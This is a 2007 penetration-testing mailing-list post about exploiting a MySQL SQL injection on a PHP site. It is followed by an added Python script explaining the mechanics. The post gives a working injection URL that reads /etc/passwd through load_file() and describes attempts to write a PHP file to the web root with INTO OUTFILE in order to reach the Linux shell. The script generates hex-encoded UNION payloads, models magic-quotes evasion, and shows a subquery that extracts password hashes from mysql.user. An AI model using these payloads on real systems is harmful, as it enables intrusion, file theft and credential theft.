Network Security Pen-Test

Breaking from MySQL to Linux system (SQL Injection).

Subject: Breaking from MySQL to Linux system (SQL Injection).
Date: Sat, 21 Jul 2007 22:28:12 -0300 (ART)
Hello

I'm pentesting a customer in black-box mode, and I
found a MySQL injection based on error responses.

I'm able to exploit it using a query like this one:

http://site/files/index.php?url=search.php&id=251%20UNION%20SELECT%20load_file(0x2F6574632F706173737764),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*&coditem=251

It worked OK, so I could extract the contents of the
passwd file.

The server has magic quotes on, so I needed to hex-encode
the filenames. The PHP files connect as user mysql.

I made some tests without success:

a) Via another flaw I could disclose the
DocumentRoot, which is /web/site. If I try to read the
index.php file, using the same injection but only
replacing /etc/passwd with
/web/site/files/index.php (hex-encoded, obviously), I
get no reply! It doesn't return any content of
index.php! The same happens for /etc/hosts. Why isn't it
working? Strange, huh? The default umask allows all
users to read newly created files; I think it is very
uncommon for a developer to remove the read permissions
from every .php file he uploads. Do you think that is the
case? Or am I missing something?


b) My goal is to be able to gain access to the Linux
system; the server has only port 80 open. My
best attempt was to create a .php file inside the
DocumentRoot and try to access it via the browser, but this
file never got created. I'm not sure whether it is because
it doesn't have permissions, or problems related to
quotes!

I tried using the method from question a) but replacing
the union with:

Select <?phpinfo.php>? into outfile 
'/http/arquivos/phpinfo.php'

I tried encoding both the PHP code and the filename
with hex. I also tried replacing the quote (') in the
name with (%). But nothing worked.

The OWASP testing guide says that if my server has
magic_quotes on, which is my case, it's not possible.

http://www.owasp.org/index.php/Testing_for_MySQL

However, NGSsoftware disagree:

http://www.ngssoftware.com/papers/HackproofingMySQL.pdf


I also tried using char() encoding and the GBK
0xbf27 trick (I had never tried it before, but it appears not to work
in this case).

Any idea how to complete this attack?

c) Because I'm using a bunch of NULLs to validate the
union statement, I can't do (at least I don't know how
to do) a complex select, which requires use of the comma
(,), or else it will break my union statement. How do I deal
with the case when my injected query has MORE commas than the
commas used in the NULLs to validate the select?

d) Any idea how to break out from MySQL to the Linux
system?

Cheers


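An added example, not part of the original post or of any tool the poster mentions, that models the three mechanics the message turns on: hex-encoding a filename so load_file() needs no quote characters (the 0x2F6574632F706173737764 literal in the post is /etc/passwd), what PHP's magic_quotes_gpc does to a payload before it reaches MySQL, and why commas inside a parenthesised subquery do not disturb the NULL padding of a UNION. The column count (10), the DocumentRoot /web/site and the sample file names are taken from the post or constructed for illustration; the query-assembly model is an assumption about how the vulnerable script concatenates its input. The outfile check relies on one MySQL fact: SELECT ... INTO OUTFILE accepts only a quoted string literal for the path, never a hex literal, so that quote is exactly what magic quotes escapes.

```python
from urllib.parse import quote

# Constructed values for illustration: the post shows 10 columns
# (load_file plus nine NULLs) and a DocumentRoot of /web/site.
NCOLS = 10
DOCROOT = "/web/site"


def mysql_hex(s: str) -> str:
    """Render a string as a MySQL hex literal (0x2F65...): it contains no
    quote characters, so magic_quotes_gpc has nothing to escape."""
    return "0x" + s.encode("utf-8").hex().upper()


def magic_quotes_gpc(s: str) -> str:
    """Model of PHP's magic_quotes_gpc applied to request data before the
    script concatenates it into the query: ' " \\ and NUL get a backslash."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def union_payload(expr: str, ncols: int = NCOLS, position: int = 0,
                  outfile=None) -> str:
    """UNION SELECT with `expr` in one column and NULL in the others, closed
    with /* so the rest of the original query is commented out. With
    `outfile` set, append INTO OUTFILE; MySQL only accepts a quoted string
    literal there (a hex literal is a syntax error), and that quote is what
    magic quotes breaks."""
    cols = ["NULL"] * ncols
    cols[position] = expr
    payload = "UNION SELECT " + ",".join(cols)
    if outfile is not None:
        payload += f" INTO OUTFILE '{outfile}'"
    return payload + "/*"


def load_file_payload(path: str, ncols: int = NCOLS) -> str:
    """Read `path` through load_file() with a hex-encoded, quote-free name."""
    return union_payload(f"load_file({mysql_hex(path)})", ncols)


def survives_magic_quotes(payload: str) -> bool:
    """True if the payload reaches MySQL unchanged through magic_quotes_gpc."""
    return magic_quotes_gpc(payload) == payload


def top_level_commas(select_list: str) -> int:
    """Count commas outside parentheses: only those separate columns. A
    scalar subquery in parentheses, however many commas it contains, is a
    single column and leaves the NULL padding of the UNION intact."""
    depth = n = 0
    for ch in select_list:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            n += 1
    return n


def as_url_param(payload: str) -> str:
    """URL-encode the payload the way it appears in the query string."""
    return quote(payload, safe="(),/*")


if __name__ == "__main__":
    p = load_file_payload("/etc/passwd")
    print(as_url_param(p))
    print("load_file payload intact:", survives_magic_quotes(p))
    # Constructed target path under the post's DocumentRoot.
    o = union_payload(mysql_hex("<?php phpinfo(); ?>"),
                      outfile=f"{DOCROOT}/files/x.php")
    print("outfile payload intact:", survives_magic_quotes(o))
    print("after magic quotes:", magic_quotes_gpc(o))
    sub = "(SELECT CONCAT(user,0x3a,password) FROM mysql.user LIMIT 1)"
    print("top-level commas in subquery:", top_level_commas(sub))
```

The load_file() payload passes through magic quotes untouched because its only string is the hex literal; the INTO OUTFILE payload arrives at MySQL as `INTO OUTFILE \'/web/site/files/x.php\'`, which is a syntax error, regardless of how the PHP body itself is encoded. For the comma question, wrapping the complex select in parentheses as one scalar subquery keeps the outer column count unchanged.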

